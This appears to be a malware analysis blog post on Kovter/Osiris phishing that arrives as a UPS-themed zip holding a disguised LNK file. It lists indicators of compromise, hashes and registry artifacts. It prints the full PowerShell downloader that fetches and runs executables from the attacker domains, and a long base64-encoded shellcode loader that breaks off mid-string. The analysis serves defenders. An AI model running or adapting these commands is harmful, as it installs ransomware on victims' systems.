A little late for this write-up, but here is an example of some Kovter/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security’s blog post which had the domains listed below. It looks as if they have been keeping tabs on these types of emails and the callbacks used as well.
All artifacts from this investigation can be found in this Github repo located here.
The attack is a simple one; phishing emails sent to users suggesting that the person has a UPS shipment that has been shipped, or not delivered which then prompts them to act. The attachment being sent is a zip file, that once unzipped, is really LNK file which is made to look like a Word document. The attack is using the route of hiding the LNK file extension since the OS is only showing the DOC extension. Also within the shortcut text box there is some Powershell code as seen in the image below. Microsoft has an article talking about this attack vector which can be found here and an updated article talking about the Kovter infection here. All of this ends with the system being encrypted with Osiris.
*Indicators of Compromise:*
50[.]62[.]238[.]1 / helpdeskng[.]com
194[.]31[.]59[.]5
128[.]1[.]191[.]207
104[.]247[.]149[.]240
48[.]176[.]164[.]247 (Port 8080)
28[.]194[.]116[.]44 (Port 8080)
193[.]75[.]133[.]172 (Port 8080)
77[.]44[.]38[.]70 (Port 8080)
60[.]193[.]66[.]163 (Port 8080)
72[.]64[.]109[.]208 (Port 8080)
14[.]47[.]201[.]123 (Port 8080)
74[.]220[.]211[.]62
189[.]177[.]220[.]156
38[.]123[.]253[.]210 (HTTPS)
128[.]1[.]191[.]207
38[.]123[.]253[.]210
40[.]135[.]7[.]195 (Port 8080)
40[.]213[.]139[.]241 (Port 8080)
131[.]168[.]180[.]20 (Port 8080)
39[.]205[.]100[.]112 (Port 8080)
97[.]167[.]78[.]47 (Port 8080)
21[.]69[.]102[.]34 (Port 8080)
28[.]246[.]201[.]182 (Port 8080)
169[.]6[.]96[.]39 (Port 8080)
83[.]102[.]201[.]113 (Port 8080)
143[.]152[.]100[.]215 (Port 8080)
*Artifacts:*
File name: a1.exe
File size: 380KB
MD5 hash: fbe08cc20207d5c4f61757484568b9b0
Virustotal: http://www.virustotal.com/en/file/bd9a3d09c31a034a9434a5f182624b70e418ed4421ee991069d3b47a156bd6ba/analysis/
First submitted: 2017-02-03 00:46:14 UTC
Detection ratio: 18 / 56
File name: a2.exe
File size: 340KB
MD5 hash: f503802c3399f2f58c9a9fdeaffdd1f6
Virustotal: NA
File name: c3046d01.e5782001b
File size: 6KB
MD5 hash: 85445dde7246db5feef9f853c7aa05e1
Virustotal: NA
File name: e7da1628.bat
File size: 77B
MD5 hash: 65ab194835a57961575c64996f91e8c3
Virustotal: NA
*Analysis of malware*
Starting from the system perspective, when executing the malicious LNK file which has the following Powershell code:
"C:\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe" -ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';function g($f){Start $f;};function z{return New-Object System[.]Net[.]WebClient;};$ld=0;$cs=[char]92;$fn=$env:temp+$cs;$dc=$fn+'a[.]doc';$c='';$q=New-Object System[.]Random;if(!(Test-Path $dc)){for($i=0;$i -lt 2000;$i++){$c=$c+[char]$q[.]Next(1,255);};$c | Out-File -FilePath $dc;};g($dc);$lk=$fn+'a[.]txt';$y=z;if(!(Test-Path $lk)){New-Item -Path $fn -Name 'a[.]txt' -ItemType File;for($n=1;$n -le 2;$n++){$f=$fn+'a'+$n+'[.]exe';$r='/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n;for($i=$ld;$i -lt $ll[.]length;$i++){$u=$ll[$i]+$r;$u='http://'+$u;$y[.]DownloadFile($u,$f);if(Test-Path $f){$v=Get-Item $f;if($v[.]length -gt 10000){$ld=$i;g($f);break;};};};};};notepad[.]exe
it is what downloads the two files called “a1.exe” and “a2.exe” since the code references the URI of “‘/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b’+$n” which looks to be in a loop, along with the code of “$f=$fn+’a’+$n+’.exe’;” giving the files their names once downloaded. This can also be seen in the PCAP:
GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b1 HTTP/1.1 Host: helpdeskng[.]com Connection: Keep-Alive HTTP/1.1 200 OK Date: Fri, 03 Feb 2017 08:49:35 GMT Server: Apache Content-Disposition: attachment; filename=f5.png Content-Length: 379904 Cache-Control: max-age=5184000 Expires: Tue, 04 Apr 2017 08:49:35 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. ----- GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b2 HTTP/1.1 Host: helpdeskng[.]com HTTP/1.1 200 OK Date: Fri, 03 Feb 2017 08:49:36 GMT Server: Apache Content-Disposition: attachment; filename=868d.png Content-Length: 339777 Cache-Control: max-age=5184000 Expires: Tue, 04 Apr 2017 08:49:36 GMT Content-Type: image/png MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
During this time Word is opened up as well, but there does not seem to be anything malicious with it from what I can see.
Once these files have been downloaded to the system, the “a1.exe” file is kicked off first and starts looking at different registry keys and file locations on the system and then shortly thereafter the “a2.exe” process is started and proceeds to look at different things within the registry and in the file system while setting registry values. For example:
HKCU\Software\7GWsaAe\GsDyqtU6qn
Type: REG_SZ
Length: 892,566
Data: ¿ËÍIBœþ†‚‘Ï«Öo‡©¸uŸ·PX¬¡1z#B2|C¤%ܳ$¼_Îd·›áþ׸?¶ þÁ£M|Þ|l˜™'ŒEÒ÷âÀaçrPhFc¶Ušes³U‹YÌLAp¼@Œw>PUpVæÿ3é¿QÑ9-2JÁ9¨7ßšõW{Yøå4sÜ×è,›ÍЧÎU”LŸåÔC¼fwÚáQ¡þŠÍ«®3™†ËL
-----
Path: HKCU\Software\7GWsaAe\xBQlLx
Type: REG_SZ
Length: 106,344
Data: aZTXBoMIgZLfYPVj5NGKkBK="nYs38HRYT745axjeErGZ1";hrAOzPmKYqnW2QUxKmF="VCl6jqYtdcCslBoDb";vJVb1JPhBOyMqrWmJRBx="DCRdConVe2Huod7tA2jpIUxuXkbVFnXQBoYfdWXgoVQy";Fd8B="151E591E534F161E100F37672E411E37731F003D1F4A6B053D4A2801217110755E3B7D24183E75173C7A452628713F0278781F661232640E2505163E5B15720F315E3C6B7E751257290316173223321B2D173F2E20042443040C5169097C005B252B77306C510A11204B587E66017406010E0F1F04342D767E76005A193B2B022E5C5B1F1F41322062027A436F0D19132C041F0A18190D0A2008283D0607521A1901130B5E7B6C7028290C371E3877315215625A15233C1333022042001E7116106606017922361F1725150230530D1A0A250A4F771D36205F0106781E0E7C06283A1330033539252A3056644C0E360C6F21116C3F6C1E3E7F4F446B6001061B3310210F740B0B730A7C3D383C0E1523172B5A372D0C314C5D74146F631D143C147C0D0A003707653B0068253D4D387D484D271B2E07122E3D372C41390C107A2C7B3D25736E2628070916197D142A122A034A621F17105D1657142B173A0C7F5055011C78720C7B1E7009180D4B1F280A1D252F1A3F193B137D781B5C320F1E1B1C7534062F62000021521C08711B6432003B34222965683D095E5E343C34180A4005080D032C161839651C3E0C69l
-----
Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\lapxjqc
Type: REG_SZ
Length: 910,252
Data: $1W=ÅåŸû>Å@ÐöB8½ƒ¯¯ØehÂp9Ñ:çîËçý„Ž]:ÜÜh
-----
Path: HKCU\Software\lqoiarkklq\txpge
Type: REG_SZ
Length: 104,872
Data: JZroJd2gxMbrSBTJpvmp="CfcD7gwy0RQtl396CbCG9ydLoE";YFzuPrDl1WIVPNuoFtEFHuBL="sVAFCJ4pbaOR0g9zsiLtZ4JFnIrTZ4HPXIfB99Oll";KZcwv8urWPpecoi2MAAU="HOWjlqH30Ja5Hy5S6djKoTme43AMVgwQOh4bn82RI3tEP9Q";dISBmzqXpuqXEiT0Yx="vB6EXz5fPclmVDTCwBRTYyglpTHZNSns88saBbp4H";O4oUMKfohXdbFHOHluMs7v="NiKtr4ds0JP7rDokSjaYH32SKl1ud8a02J";nRvfucl0mnbmtVCoYKkLaCv="KsfhOr8tfAOhUEjDdI8Pv75noMhmbMSBTITAIyGbnze";WWzxToRttSpb7OJXj7FhRf="Nbd8efU5ArtYWp4ulpRDrGUJzinSWVVz096QrMT4mWLwL";PLyiIuCPJovOeDLujY4LeMe="e5te7kFWHrvPAWF0dVNqNmTBcY1YPzRJvlxNsoz7hA3AaJ";VEc1="317B3C38735B2E2F013565301C12094B0E231B39270A7B0F0F061E1F742F1176652349571D1E553662612C7E7E392C3703060218300F66533F3A101D006045693130203039173106491D14357505117D3D204F183E1D6E5B3B1338303207015A0622074E102A10271E297B2B70755B1C3952503127051C2531703D2439091C1E2C212713196006715A3E201425101C3114333B150B3A15130C383C210E001D13762928240230651014132C7A675920280A4C34231036051F1960637E0065570855474D4C2831322F362621017A7B69527D4101073B7F45212C2647131620130110193D371B0139056D571E621B065C181E4B0011320l
At this time I can not be for certain what the purpose of each of these files are, and if their purpose is completely different or if they have aspects of overlap to them. The only thing that is apparent to me at this time is the fact that the a1.exe process is the main process that encrypts the files on the system, where the a2.exe process is not handling the encryption and seems to be handling the persistence part of this infection.
The Powershell script also kicks off two other processes (both are regsvr32.exe) which is used to create persistence on the now infected system via some registry keys and on the file system, but to also keep an open connection to the C2 systems.
The interesting thing about one of these regsvr32.exe processes (PID 612) is that there is the following block of code that has been base64 encoded when the process is started from it’s parent:
APPDATA=C:\Users\Administrator\AppData\Roaming
aykqh=iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('I2F2b2Jtc2p2dWNqdW9jeHVua2FqdXZvZ2liZGNta2VxcA0Kc2xlZXAoMTUpO3RyeXsNCiN3cWR5bw0KZnVuY3Rpb24gZ2RlbGVnYXRlew0KI2ZkZmZmZXBxb28NClBhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1R5cGVbXV0gJFBhcmFtZXRlcnMsW1BhcmFtZXRlcihQb3NpdGlvbj0xKV0gW1R5cGVdICRSZXR1cm5UeXBlPVtWb2lkXSk7DQojZ2t0ZnJiag0KJFR5cGVCdWlsZGVyPVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgoTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoIlJlZmxlY3RlZERlbGVnYXRlIikpLFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgiSW5NZW1vcnlNb2R1bGUiLCRmYWxzZSkuRGVmaW5lVHlwZSgiWFhYIiwiQ2xhc3MsUHVibGljLFNlYWxlZCxBbnNpQ2xhc3MsQXV0b0NsYXNzIixbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSk7DQojbndia2NpDQokVHlwZUJ1aWxkZXIuRGVmaW5lQ29uc3RydWN0b3IoIlJUU3BlY2lhbE5hbWUsSGlkZUJ5U2lnLFB1YmxpYyIsW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCRQYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCJSdW50aW1lLE1hbmFnZWQiKTsNCiN0aGxyDQokVHlwZUJ1aWxkZXIuRGVmaW5lTWV0aG9kKCJJbnZva2UiLCJQdWJsaWMsSGlkZUJ5U2lnLE5ld1Nsb3QsVmlydHVhbCIsJFJldHVyblR5cGUsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOw0KI2N4eXd6ZmwNCnJldHVybiAkVHlwZUJ1aWxkZXIuQ3JlYXRlVHlwZSgpO30NCiNhbGtmcHlpanFsDQpmdW5jdGlvbiBncHJvY3sNCiNta2xlbGRzZmNsDQpQYXJhbSAoW1BhcmFtZXRlcihQb3NpdGlvbj0wLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRNb2R1bGUsW1BhcmFtZXRlcihQb3NpdGlvbj0xLE1hbmRhdG9yeT0kVHJ1ZSldIFtTdHJpbmddICRQcm9jZWR1cmUpOw0KI2JwbmllDQokU3lzdGVtQXNzZW1ibHk9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpfFdoZXJlLU9iamVjdHskXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlwiKVstMV0uRXF1YWxzKCJTeXN0ZW0uZGxsIil9Ow0KI3Zkem5pZ2sNCiRVbnNhZmVOYXRpdmVNZXRob2RzPSRTeXN0ZW1Bc3NlbWJseS5HZXRUeXBlKCJNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcyIpOw0KI2p1dHZiaXcNCnJldHVybiAkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldFByb2NBZGRyZXNzIikuSW52b2tlKCRudWxsLEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCRVbnNhZmVOYXRpdmVNZXRob2RzLkdldE1ldGhvZCgiR2V0TW9kdWxlSGFuZGxlIikuSW52b2tlKCRudWxsLEAoJE1vZHVsZSkpKSksJFByb2NlZHVyZSkpO30NCiNpY2Vib2ZuYw0KW0J5dGVbXV0gJHNjMzIgPSAweDU1LDwjcnByIz4weDhCLDB4RUMsPCNqaSM+MHg4MSwweEM0LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MywweDU2LDB4NTcsMHg1MywweDU2LDB4NTcsMHhGQywweDMxLDB4RDIsMHg2NCwweDhCLDwjYXR3Iz4weDUyLDB4MzAsMHg4QiwweDUyLDwjYmVwIz4weDBDLDB4OEIsMHg1MiwweDE0LDB4OEIsMHg3MiwweDI4LDB4NkEsMHgxOCwweDU5LDB4MzEsMHhGRiwweDMxLDB4QzAsPCNjY2QjPjB4QUMsMHgzQywweDYxLDB4N0MsMHgwMiwweDJDLDB4MjAsMHhDMSwweENGLDB4MEQsMHgwMSwweEM3LDB4RTIsMHhGMCwweDgxLDB4RkYsMHg1QiwweEJDLDB4NEEsMHg2QSwweDhCLDB4NUEsMHgxMCwweDhCLDB4MTIsMHg3NSwweERCLDB4ODksPCNybyM+MHg1RCwweEZDLDwjc2MjPjB4NUYsMHg1RSwweDVCLDB4OEIsMHg0NSwweEZDLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHgwRiw8I2N3Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhGQywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsPCNscGojPjB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4OSwweDQ1LDB4RDAsMHg4QiwweDQ1LDB4RDAsMHg4MSwweDM4LDB4NTAsMHg0NSwweDAwLDB4MDAsMHgwRiwweDg1LDB4RTUsMHgwMSwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsPCNxa3EjPjB4OEIsMHg0MCwweDc4LDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweENDLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDE4LDB4ODUsMHhDMCwweDBGLDwjYXQjPjB4OEMsMHhDQiwweDAxLDB4MDAsMHgwMCwweDQwLDB4ODksMHg4NSw8I254ZyM+MHgzQywweEZGLDB4RkYsMHhGRiwweDMzLDB4RjYsMHg4QiwweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyMCwweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsPCNsY2IjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHg0RCwweEZDLDB4ODEsMHgzOSwweDRDLDB4NkYsMHg2MSwweDY0LDB4NzUsMHg1NiwweDhELDB4NDEsMHgwNCwweDgxLDB4MzgsMHg0Qyw8I29sciM+MHg2OSwweDYyLDB4NzIsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDYxLDB4NzIsMHg3OSwweDQxLDwjbmEjPjB4NzUsMHg0MCwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDwjeHRnIz4weDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsPCNpZ2UjPjB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDB4MDMsMHhEMCwweDhCLDB4MDIsMHgwMywweDQ1LDB4RkMsMHg4OSwweDQ1LDB4QkMsPCN1c3IjPjB4ODEsMHgzOSwweDQ3LDB4NjUsMHg3NCwweDUwLDwjbmZ6Iz4weDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDwjY3AjPjB4NzIsMHg2RiwweDYzLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCw8I2pvIz4weDY0LDB4NjQsMHg3MiwweDY1LDB4NzUsMHg0MCwweDhELDB4NDEsMHgwRSwweDgwLDB4MzgsMHgwMCw8I3NicyM+MHg3NSwweDM4LDB4OEIsPCNhYyM+MHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHg0NSwweEZDLDB4MzMsMHhEMiw8I2RkIz4weDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsPCN2dWUjPjB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHg1NSwweEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCw8I2x4Iz4weDAyLDB4MDMsPCNwaGEjPjB4RDAsMHg4Qiw8I3N0Iz4weDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSwweEI4LDwjb2FpIz4weDgxLDB4MzksMHg1NiwweDY5LDB4NzIsMHg3NCwweDc1LDB4NTYsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzUsMHg2MSwweDZDLDB4NDEsMHg3NSwweDRCLDB4OEQsMHg0MSwweDA4LDB4ODEsPCN1bXMjPjB4MzgsPCN2enojPjB4NkMsMHg2QywweDZGLDB4NjMsMHg3NSwweDQwLDB4OEQsPCN1dSM+MHg0MSwweDBDLDB4ODAsMHgzOCwweDAwLDB4NzUsMHgzOCwweDhCLDB4NDUsMHhDQywweDhCLDB4NDAsMHgyNCwweDAzLDB4NDUsPCNqcHgjPjB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsMHgwMywweEMwLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDY2LDB4OEIsMHgwMCwweDhCLDB4NTUsMHhDQywweDhCLDB4NTIsMHgxQywweDAzLDB4NTUsMHhGQywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHg0NSwweEZDLDB4ODksMHg0NSw8I3N4cyM+MHhBOCwweDgxLDB4MzksPCNrZGsjPjB4NDUsMHg3OCwweDY5LDB4NzQsMHg3NSwweDYzLDB4OEQsMHg0MSwweDA0LDwjaXdqIz4weDgxLDwjd255Iz4weDM4LDB4NTAsMHg3MiwweDZGLDB4NjMsMHg3NSwweDU4LDB4OEQsPCNtcGwjPjB4NDEsMHgwOCwweDgwLDB4MzgsMHg2NSwweDc1LDB4NTAsMHg4RCwweDQxLDB4MDksMHg4MCwweDM4LDB4NzMsMHg3NSwweDQ4LDB4OEQsMHg0MSwweDBBLDB4ODAsMHgzOCwweDczLDB4NzUsMHg0MCwweDgzLDB4QzEsMHgwQiw8I2VvIz4weDgwLDB4MzksMHgwMCwweDc1LDB4MzgsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweDQ1LDB4RkMsMHgzMywweEQyLDB4NTIsMHg1MCwweDhCLDB4QzYsPCN4engjPjB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjYngjPjB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweDU1LDwjbWV5Iz4weEZDLDB4MEYsMHhCNywweEMwLDB4QzEsMHhFMCwweDAyLDwjZWJoIz4weDAzLDB4RDAsPCNxeWwjPjB4OEIsMHgwMiwweDAzLDB4NDUsMHhGQywweDg5LDB4NDUsMHhBNCwweDQ2LDB4RkYsMHg4RCwweDNDLDB4RkYsMHhGRiwweEZGLDwjZG5pIz4weDBGLDB4ODUsMHgzRSwweEZFLDB4RkYsMHhGRiw8I3FuIz4weEM2LDB4ODUsMHgyRiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHhDNiwweDg1LDB4MzEsMHhGRiwweEZGLDB4RkYsMHg3NiwweEM2LDB4ODUsMHgzMiwweEZGLDB4RkYsMHhGRiwweDYxLDB4QzYsMHg4NSwweDMzLDB4RkYsMHhGRiwweEZGLDB4NzAsMHhDNiwweDg1LDB4MzQsMHhGRiwweEZGLDB4RkYsMHg2OSwweEM2LDB4ODUsMHgzNSwweEZGLDB4RkYsMHhGRiwweDMzLDB4QzYsMHg4NSw8I216ZiM+MHgzNiwweEZGLDB4RkYsMHhGRiwweDMyLDwjbGQjPjB4QzYsMHg4NSwweDM3LDB4RkYsMHhGRiwweEZGLDB4MkUsMHhDNiwweDg1LDB4MzgsMHhGRiwweEZGLDB4RkYsMHg2NCwweEM2LDB4ODUsMHgzOSwweEZGLDB4RkYsMHhGRiwweDZDLDB4QzYsMHg4NSwweDNBLDB4RkYsPCNsYnIjPjB4RkYsMHhGRiwweDZDLDwjcHUjPjB4QzYsMHg4NSwweDNCLDB4RkYsMHhGRiwweEZGLDB4MDAsMHg4RCwweDg1LDB4MkYsMHhGRiwweEZGLDB4RkYsMHg1MCwweEZGLDB4NTUsMHhCQywweDhCLDB4RDgsMHg4NSwweERCLDB4NzUsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4OSwweDVELDB4RDQsMHg4QiwweDQ1LDB4RDQsMHg2NiwweDgxLDB4MzgsMHg0RCwweDVBLDB4MEYsMHg4NSwweDRGLDB4MDEsMHgwMCwweDAwLDB4OEIsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweEQ0LDB4OEIsMHg0MCwweDNDLDB4OTksMHgwMywweDA0LDB4MjQsMHgxMywweDU0LDB4MjQsMHgwNCwweDgzLDB4QzQsMHgwOCwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHgyNiwweDAxLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NDAsMHg3OCwweDAzLDB4QzMsMHg4OSwweDQ1LDB4Q0MsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MTgsMHg4NSwweEMwLDB4MEYsMHg4QywweDBELDB4MDEsMHgwMCwweDAwLDB4NDAsMHg4OSwweDg1LDB4M0MsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEIsMHhDMyw8I3RoIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDIwLDwja3NrIz4weDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweEMxLDB4RTAsMHgwMiwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDwjdWF6Iz4weDA0LDB4ODMsMHhDNCwweDA4LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg4QiwweDA4LDB4MDMsMHhDQiwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg0RiwweDc1LDB4NUIsMHg4RCwweDQxLDB4MDQsMHg4MSwweDM4LDB4NzAsMHg2NSwweDZFLDB4NEIsMHg3NSwweDUwLDB4OEQsMHg0MSwweDA4LDB4ODEsMHgzOCwweDY1LDB4NzksMHg0NSwweDc4LDB4NzUsMHg0NSwweDhELDB4NDEsMHgwQywweDgwLDB4MzgsMHg0MSwweDc1LDB4M0QsMHg4RCwweDQxLDB4MEQsMHg4MCwweDM4LDB4MDAsMHg3NSwweDM1LDwjdHgjPjB4OEIsMHg0NSwweENDLDB4OEIsMHg0MCwweDI0LDB4MDMsMHhDMywweDMzLDB4RDIsMHg1MiwweDUwLDB4OEIsMHhDNiwweDAzLDB4QzAsMHg5OSwweDAzLDB4MDQsMHgyNCwweDEzLDB4NTQsMHgyNCwweDA0LDB4ODMsMHhDNCwweDA4LDB4NjYsMHg4QiwweDAwLDB4OEIsMHg1NSwweENDLDB4OEIsMHg1MiwweDFDLDB4MDMsMHhEMywweDBGLDB4QjcsMHhDMCwweEMxLDB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsMHhDMywweDg5LDB4NDUsMHhCMCwweDgxLDB4MzksMHg1MiwweDY1LDB4NjcsMHg1MSwweDc1LDB4NUUsMHg4RCw8I25pdSM+MHg0MSwweDA0LDB4ODEsMHgzOCw8I2prIz4weDc1LDB4NjUsMHg3Miw8I2xxIz4weDc5LDB4NzUsMHg1MywweDhELDB4NDEsMHgwOCwweDgxLDB4MzgsMHg1NiwweDYxLDB4NkMsMHg3NSwweDc1LDB4NDgsMHg4RCwweDQxLDB4MEMsMHg4MSwweDM4LDB4NjUsMHg0NSwweDc4LDB4NDEsMHg3NSwweDNELDB4ODMsMHhDMSw8I3lxZiM+MHgxMCwweDgwLDB4MzksMHgwMCwweDc1LDwjdG4jPjB4MzUsMHg4QiwweDQ1LDB4Q0MsMHg4QiwweDQwLDB4MjQsMHgwMywweEMzLDB4MzMsMHhEMiwweDUyLDB4NTAsMHg4QiwweEM2LDB4MDMsMHhDMCwweDk5LDB4MDMsMHgwNCwweDI0LDB4MTMsMHg1NCwweDI0LDB4MDQsMHg4MywweEM0LDB4MDgsMHg2NiwweDhCLDB4MDAsMHg4QiwweDU1LDB4Q0MsMHg4QiwweDUyLDB4MUMsMHgwMywweEQzLDB4MEYsMHhCNywweEMwLDB4QzEsPCN3dG4jPjB4RTAsMHgwMiwweDAzLDB4RDAsMHg4QiwweDAyLDB4MDMsPCN2dCM+MHhDMywweDg5LDwjaG5lIz4weDQ1LDB4QUMsMHg0Niw8I21lbiM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHgwRiwweDg1LDB4RkMsPCNja3ojPjB4RkUsMHhGRiwweEZGLDB4OEIsMHg0NSwweDA4LDB4MDUsMHg0OCwweDBBLDB4MDAsMHgwMCwweDg5LDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiw8I2lrcSM+MHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEU0LDB4MDAsMHgwMCw8I3FldiM+MHgwMCwweDg5LDwjeHNiIz4weDg1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweERCLDB4MzMsMHhDMCwweDg5LDB4ODUsMHg2NCw8I2FvIz4weEZGLDB4RkYsMHhGRiwweDMzLDB4QzAsMHg4OSwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg4RCwweDg1LDB4NzAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAyLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4ODUsMHg4NiwweDAwLDB4MDAsMHgwMCwweDhELDB4ODUsMHg2MCwweEZGLDwjb3ojPj